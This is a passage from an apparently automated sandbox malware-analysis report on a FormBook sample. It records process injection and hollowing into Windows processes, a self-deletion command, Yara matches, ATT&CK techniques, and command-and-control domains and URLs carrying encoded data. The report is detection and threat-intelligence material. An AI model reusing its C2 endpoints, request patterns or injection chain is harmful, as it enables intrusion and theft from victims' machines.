          Source: C:\Windows\explorer.exeDomain query: www.ytksw.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.217.168.83 80
          Source: C:\Windows\explorer.exeDomain query: www.soccer-yokouchi.club
          Source: C:\Windows\explorer.exeDomain query: www.helenafinaltouch.com
          Source: C:\Windows\explorer.exeNetwork Connect: 45.39.20.158 80
          Source: C:\Windows\explorer.exeDomain query: www.contorig2.com
          Source: C:\Windows\explorer.exeNetwork Connect: 160.153.132.205 80
          Source: C:\Windows\explorer.exeDomain query: www.bogolacke.com
          Source: C:\Windows\explorer.exeDomain query: www.albanyhumanesociety.net
          Source: C:\Windows\explorer.exeDomain query: www.muldentaxi.com
          Source: C:\Windows\explorer.exeDomain query: www.gofourd.com
          Source: C:\Windows\explorer.exeDomain query: www.buraktradingltd.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 64.190.62.111 80
          Source: C:\Windows\explorer.exeDomain query: www.sandybottomsflipflops.com
          Allocates memory in foreign processesShow sources
          Source: C:\Users\user\Desktop\00098765123POIIU.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\00098765123POIIU.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3440
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 380000
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\00098765123POIIU.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
          Source: C:\Users\user\Desktop\00098765123POIIU.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
          Source: C:\Users\user\Desktop\00098765123POIIU.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 642008
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
          Source: explorer.exe, 00000004.00000002.596849934.0000000000EE0000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.598188389.0000000005480000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.596849934.0000000000EE0000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.598188389.0000000005480000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.596849934.0000000000EE0000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.598188389.0000000005480000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000004.00000002.596849934.0000000000EE0000.00000002.00000001.sdmp, wlanext.exe, 00000007.00000002.598188389.0000000005480000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\00098765123POIIU.exeQueries volume information: C:\Users\user\Desktop\00098765123POIIU.exe VolumeInformation
          Source: C:\Users\user\Desktop\00098765123POIIU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\00098765123POIIU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\00098765123POIIU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\00098765123POIIU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\00098765123POIIU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\00098765123POIIU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000007.00000002.595659857.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.377717750.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.596425182.00000000032F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.378011381.0000000000E40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.597635869.0000000003750000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.338604587.0000000004261000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.378035530.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection812Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection812NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 411893 Sample: 00098765123POIIU.exe Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 31 www.hysjs168.com 2->31 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 5 other signatures 2->45 11 00098765123POIIU.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\...\00098765123POIIU.exe.log, ASCII 11->29 dropped 55 Writes to foreign memory regions 11->55 57 Allocates memory in foreign processes 11->57 59 Injects a PE file into a foreign processes 11->59 15 RegSvcs.exe 11->15         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 2 other signatures 15->67 18 explorer.exe 15->18 injected process9 dnsIp10 33 www.sandybottomsflipflops.com 18->33 35 www.muldentaxi.com 64.190.62.111, 49734, 80 NBS11696US United States 18->35 37 18 other IPs or domains 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 22 wlanext.exe 18->22         started        signatures11 process12 signatures13 49 Modifies the context of a thread in another process (thread injection) 22->49 51 Maps a DLL or memory area into another process 22->51 53 Tries to detect virtualization through RDTSC time measurements 22->53 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          00098765123POIIU.exe26%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          3.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.bogolacke.com/uv34/?D0Dhj=+vqKyqUCNNB8UOC5vqb0WBoKaqjxAK/4hHhktlBEWoOvrJqCXDBsl1GlrElBRZa3I6kwNHO8pA==&_JB=SL3d2L80%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.muldentaxi.com/uv34/?D0Dhj=I0+BvmO4ljK/nbLycIQPHPNytqxJ+McfjEJZrssF4WFDr3bjf8ExST5+Hjhrql3HpJj1V9F8nQ==&_JB=SL3d2L80%Avira URL Cloudsafe
          http://www.embraceblm.com/uv34/?_JB=SL3d2L8&D0Dhj=eNNoAymEF6y0s09AHznbvWkLlOIpJJQGxSgvNiYX7faSVxdWVtwFBOGKoePvfd+8zgTPPgb0Mw==0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          www.hysjs168.com/uv34/0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.ihdeuruim.com/uv34/?D0Dhj=zJB2497tyCkLF9DVAXbTh77yBITnH8u2gz7PlO+nNFbEPXoEJKTpFMEIIpupFtT+IJYk9y/VZw==&_JB=SL3d2L80%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.buraktradingltd.com/uv34/?_JB=SL3d2L8&D0Dhj=D75OsDlTHma4nCt/XHhVQTvedHvqJVej3CEGNnFddBs05fHEvG09IitQFVRojVJr/TkJxJHlYg==0%Avira URL Cloudsafe
          http://www.albanyhumanesociety.net/uv34/?_JB=SL3d2L8&D0Dhj=n+Qx4VWs28a7eV8im5Y5Lb9MLKmoTPPxFKEnTVg2IpEKdb6ImeQQO/tB44tc09WLnIG/s9VgcA==0%Avira URL Cloudsafe
          http://www.contorig2.com/uv34/?_JB=SL3d2L8&D0Dhj=PNkuYexmaEbpw3EaQG1gqEXEhReu9m0wSncWUc9u1VG5H+XH3gAiJ6++bzNk4ZSFpS3p79DaPA==0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.gofourd.com/uv34/?_JB=SL3d2L8&D0Dhj=JPLVpJ2/QgCmFDz5d9+MEwsOtRSRnv4p4HgKpBtvwLNy+R4nAh4AcVIWdvhB9Yv67aR/bJ0jJQ==0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sandybottomsflipflops.com/uv34/?_JB=SL3d2L8&D0Dhj=/y2QUNCyd1bGxdPjEN+TG3wvArtE+ieT5j9LKQh68qSP5982epgdoI7eXFRWiHaQS6pCkVOSpw==0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.muldentaxi.com
          64.190.62.111
          truetrue
            unknown
            gofourd.com
            34.102.136.180
            truefalse
              unknown
              embraceblm.com
              34.102.136.180
              truefalse
                unknown
                www.hysjs168.com
                182.61.46.180
                truetrue
                  unknown
                  www.buraktradingltd.com
                  173.236.152.151
                  truetrue
                    unknown
                    bogolacke.com
                    160.153.132.205
                    truetrue
                      unknown
                      parkingpage.namecheap.com
                      198.54.117.217
                      truefalse
                        high
                        www.ytksw.com
                        45.39.20.158
                        truetrue
                          unknown
                          albanyhumanesociety.net
                          34.102.136.180
                          truefalse
                            unknown
                            ghs.googlehosted.com
                            172.217.168.83
                            truefalse
                              unknown
                              www.contorig2.com
                              199.192.23.253
                              truetrue
                                unknown
                                www.maraitime.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.ihdeuruim.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.embraceblm.com
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.soccer-yokouchi.club
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.helenafinaltouch.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.bogolacke.com
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.albanyhumanesociety.net
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.gofourd.com
                                              unknown
                                              unknowntrue
                                                unknown
                                                www.sandybottomsflipflops.com
                                                unknown
                                                unknowntrue
                                                  unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.bogolacke.com/uv34/?D0Dhj=+vqKyqUCNNB8UOC5vqb0WBoKaqjxAK/4hHhktlBEWoOvrJqCXDBsl1GlrElBRZa3I6kwNHO8pA==&_JB=SL3d2L8true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.muldentaxi.com/uv34/?D0Dhj=I0+BvmO4ljK/nbLycIQPHPNytqxJ+McfjEJZrssF4WFDr3bjf8ExST5+Hjhrql3HpJj1V9F8nQ==&_JB=SL3d2L8true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.embraceblm.com/uv34/?_JB=SL3d2L8&D0Dhj=eNNoAymEF6y0s09AHznbvWkLlOIpJJQGxSgvNiYX7faSVxdWVtwFBOGKoePvfd+8zgTPPgb0Mw==false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  www.hysjs168.com/uv34/true
                                                  • Avira URL Cloud: safe
                                                  low
                                                  http://www.ihdeuruim.com/uv34/?D0Dhj=zJB2497tyCkLF9DVAXbTh77yBITnH8u2gz7PlO+nNFbEPXoEJKTpFMEIIpupFtT+IJYk9y/VZw==&_JB=SL3d2L8false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.buraktradingltd.com/uv34/?_JB=SL3d2L8&D0Dhj=D75OsDlTHma4nCt/XHhVQTvedHvqJVej3CEGNnFddBs05fHEvG09IitQFVRojVJr/TkJxJHlYg==true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.albanyhumanesociety.net/uv34/?_JB=SL3d2L8&D0Dhj=n+Qx4VWs28a7eV8im5Y5Lb9MLKmoTPPxFKEnTVg2IpEKdb6ImeQQO/tB44tc09WLnIG/s9VgcA==false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.contorig2.com/uv34/?_JB=SL3d2L8&D0Dhj=PNkuYexmaEbpw3EaQG1gqEXEhReu9m0wSncWUc9u1VG5H+XH3gAiJ6++bzNk4ZSFpS3p79DaPA==true
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.gofourd.com/uv34/?_JB=SL3d2L8&D0Dhj=JPLVpJ2/QgCmFDz5d9+MEwsOtRSRnv4p4HgKpBtvwLNy+R4nAh4AcVIWdvhB9Yv67aR/bJ0jJQ==false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.sandybottomsflipflops.com/uv34/?_JB=SL3d2L8&D0Dhj=/y2QUNCyd1bGxdPjEN+TG3wvArtE+ieT5j9LKQh68qSP5982epgdoI7eXFRWiHaQS6pCkVOSpw==true
                                                  • Avira URL Cloud: safe
                                                  unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000000.341318764.000000000095C000.00000004.00000020.sdmpfalse
                                                    high
                                                    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.fontbureau.comexplorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              high
                                                              http://www.tiro.comexplorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                high
                                                                http://www.goodfont.co.krexplorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  http://www.carterandcone.comlexplorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.typography.netDexplorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                    high
                                                                    http://www.founder.com.cn/cn/cTheexplorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://fontfabrik.comexplorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.founder.com.cn/cnexplorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                      high
                                                                      http://www.jiyu-kobo.co.jp/explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.fontbureau.com/designers8explorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                        high
                                                                        http://www.fonts.comexplorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                          high
                                                                          http://www.sandoll.co.krexplorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.urwpp.deDPleaseexplorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.zhongyicts.com.cnexplorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name00098765123POIIU.exe, 00000000.00000002.337814717.0000000003261000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://www.sakkal.comexplorer.exe, 00000004.00000000.363001805.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown

                                                                            Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            198.54.117.217
                                                                            parkingpage.namecheap.comUnited States
                                                                            22612NAMECHEAP-NETUSfalse
                                                                            160.153.132.205
                                                                            bogolacke.comUnited States
                                                                            21501GODADDY-AMSDEtrue
                                                                            199.192.23.253
                                                                            www.contorig2.comUnited States
                                                                            22612NAMECHEAP-NETUStrue
                                                                            173.236.152.151
                                                                            www.buraktradingltd.comUnited States
                                                                            26347DREAMHOST-ASUStrue
                                                                            34.102.136.180
                                                                            gofourd.comUnited States
                                                                            15169GOOGLEUSfalse
                                                                            64.190.62.111
                                                                            www.muldentaxi.comUnited States
                                                                            11696NBS11696UStrue
                                                                            172.217.168.83
                                                                            ghs.googlehosted.comUnited States
                                                                            15169GOOGLEUSfalse
                                                                            45.39.20.158
                                                                            www.ytksw.comUnited States
                                                                            18779EGIHOSTINGUStrue

                                                                            General Information

                                                                            Joe Sandbox Version:32.0.0 Black Diamond
                                                                            Analysis ID:411893
                                                                            Start date:12.05.2021
                                                                            Start time:08:39:57
                                                                            Joe Sandbox Product:CloudBasic
                                                                            Overall analysis duration:0h 9m 48s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:light
                                                                            Sample file name:00098765123POIIU.exe
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                            Number of analysed new started processes analysed:26
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:1
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • HDC enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.evad.winEXE@7/1@14/8
                                                                            EGA Information:Failed
                                                                            HDC Information:
                                                                            • Successful, ratio: 73.1% (good quality ratio 66.9%)
                                                                            • Quality average: 71.1%
                                                                            • Quality standard deviation: 32.2%
                                                                            HCA Information:
                                                                            • Successful, ratio: 100%
                                                                            • Number of executed functions: 0
                                                                            • Number of non-executed functions: 0
                                                                            Cookbook Comments:
                                                                            • Adjust boot time
